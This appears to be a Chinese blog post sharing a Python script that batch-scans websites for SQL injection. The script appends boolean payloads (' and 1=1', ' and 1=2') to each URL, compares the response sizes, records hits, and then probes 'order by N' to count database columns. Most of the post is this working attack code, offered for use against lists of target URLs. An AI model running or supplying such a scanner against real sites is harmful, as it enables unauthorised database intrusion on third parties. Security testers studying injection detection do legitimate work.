• python批量检测注入点脚本


    # -*- coding:utf-8 -*-
    def logo():
        """Print the author/blog ASCII banner, one fixed-width row per line."""
        banner_rows = (
            "                                               ***                  ",
            "                                             *     *                ",
            "                    author:                 *       *               ",
            "                            Screw            *                      ",
            "                                              *****                 ",
            "                                                   *                ",
            "                                            *       *               ",
            "                   blog:                     *     *                ",
            "                                               ***                  ",
            "                        http://www.cnblogs.com/pojun/               ",
        )
        for row in banner_rows:
            print(row)
    #运行环境python3.0   批量的话,在本目录建一个url.txt文件将注入点导入。    
    import threading    
    import requests
    # Module-level state shared by the functions in this script.
    i = 0  # not read by any function visible here
    # String flag ('true'/'false'), not a bool: piliang() sets it to 'false'
    # when a request fails and resets it to 'true' for the next URL.
    err = 'true'
    # The two boolean suffixes appended verbatim to each tested URL; the check
    # only compares the response sizes they produce. Both literals appear in the
    # requested URL, so they are visible in the target's access/WAF logs.
    exp = [' and 1=1', ' and 1=2']
    chang = []  # response lengths collected by judge()
    new_str = ""  # piliang() assigns a local of the same name instead
    #判断注入点
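    def judge():
        """Compare response sizes for the two boolean suffixes on the global ``url``.

        Requests ``url + exp[0]`` and ``url + exp[1]`` and compares the lengths of
        the two response bodies. Different lengths are reported as "injectable"
        and ``field(url)`` is called; equal lengths are reported as not injectable.

        The result is only a size heuristic: a page with dynamic content
        (timestamps, per-request tokens, rotating ads) differs in length without
        any SQL involvement, and two different pages of equal length are missed.

        Raises:
            SystemExit: if either request fails.
        """
        # Use a local list. The module-level ``chang`` kept growing across calls,
        # so a second call would have compared the first call's stale lengths.
        lengths = []
        for suffix in exp[:2]:
            try:
                # Bounded wait so an unresponsive host cannot hang the script
                # (field() and piliang() already pass a timeout).
                body = requests.get(url + suffix, timeout=10).text
            except requests.RequestException:
                # NOTE(review): the message blames a WAF / connection reset, but
                # any request failure (DNS, timeout, bad URL) ends up here.
                print(u"网站有waf,连接被重置!")
                raise SystemExit(1)
            lengths.append(len(body))

        if lengths[1] != lengths[0]:
            print(u'网站======>存在注入!')
            field(url)
        else:
            print(u'网站=======>" 不 "存在注入!')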
    
    #判断字段(field)
    def field(weburl):
        """Request ``weburl + " order by N"`` for N = 1..30 and compare body lengths.

        Odd N stores its response length in one slot and even N in the other, so
        from N = 2 onward each round compares the current response with the
        previous one. On the first difference it prints N - 1 and stops.

        NOTE(review): a failed request leaves the previous length in its slot, so
        the comparison can run against a stale value; with ``timeout=1`` this is
        easy to hit on a slow server. The bare ``except`` also swallows
        KeyboardInterrupt. The fixed 1..30 sequence from one client is plainly
        visible in the target's access logs.
        """
        odd_len = ""
        even_len = ""
        for j in range(1, 31):
            probe = weburl + " order by " + str(j)
            if j % 2 == 1:
                try:
                    odd_len = len(requests.get(probe, timeout=1).text)
                except:
                    # Silent on failure: odd_len keeps its previous value.
                    pass
            else:
                try:
                    even_len = len(requests.get(probe, timeout=1).text)
                except:
                    print(u"网站有waf,连接被重置!")

            # The first round has nothing to compare against, hence j > 1.
            if j > 1 and odd_len != even_len:
                print(u"字段数为========================>", j - 1)
                break
    #批量
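    def piliang():
        """Batch mode: run the two-suffix size comparison on every URL in ``url.txt``.

        Reads ``url.txt`` (UTF-8, one URL per line) from the working directory.
        For each URL it requests ``url + exp[0]`` and ``url + exp[1]`` and compares
        the response body lengths; URLs whose lengths differ are appended to
        ``ture_sql.txt``. A URL whose request fails is reported and skipped.

        The comparison is a size heuristic only: dynamic page content produces
        false positives, and equal-length responses are missed.
        """
        global err

        # Close the input file deterministically and ignore blank lines. The
        # original sliced off the last split element, which dropped the final
        # URL whenever the file did not end with a newline.
        with open('url.txt', encoding="utf-8") as handle:
            targets = [line.strip() for line in handle if line.strip()]

        for target in targets:
            lengths = []
            print(target)
            for suffix in exp[:2]:
                try:
                    lengths.append(len(requests.get(target + suffix, timeout=1).text))
                except requests.RequestException:
                    # NOTE(review): any request failure is reported as a WAF reset.
                    err = 'false'
                    print(u"网站有waf,连接被重置!")
                    break

            if err == 'true':
                if lengths[1] == lengths[0]:
                    print(u'网站========>" 不 "存在注入!')
                else:
                    print(u'网站========>存在注入!')
                    # field() is not run in batch mode (the author left that
                    # call disabled); the URL is only recorded. The file name
                    # keeps its original spelling so existing output still matches.
                    with open('ture_sql.txt', 'a', encoding="utf-8") as out:
                        out.write(target + '\n')

            # Reset the shared flag before the next URL.
            err = 'true'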
    
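    # Menu: 1 = batch mode over url.txt, 2 = single URL plus the order-by check.
    # The prompt used to name "1.txt", but piliang() reads url.txt.
    print(u'1.批量注入,存在本目录的url.txt  2.单点注入,并判断字段数 ')
    try:
        choice = int(input("ID? :"))
    except ValueError:
        # Non-numeric input takes the "invalid input" branch instead of a traceback.
        choice = None

    if choice == 1:
        t1 = threading.Thread(target=piliang)
        t1.start()
        t1.join()

    elif choice == 2:
        # judge() reads this module-level name.
        url = input('url :')

        # judge() already calls field(url) when the two responses differ. The
        # original then built a second Thread for field() and joined it without
        # starting it, which raises RuntimeError; that thread is dropped.
        judge()

    else:
        print(u"输入错误!")

    logo()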

    本脚本是自己学完python后练手的第一个脚本,所以结构比较混乱,但是效果还是不错的。基本没有误报!需要注意的是,脚本只比较两次响应正文的长度:页面若含动态内容(时间戳、随机令牌、广告等),长度本身就会变化,从而产生误报;两次响应长度恰好相同时则会漏报。

  • 原文地址:https://www.cnblogs.com/pojun/p/7302246.html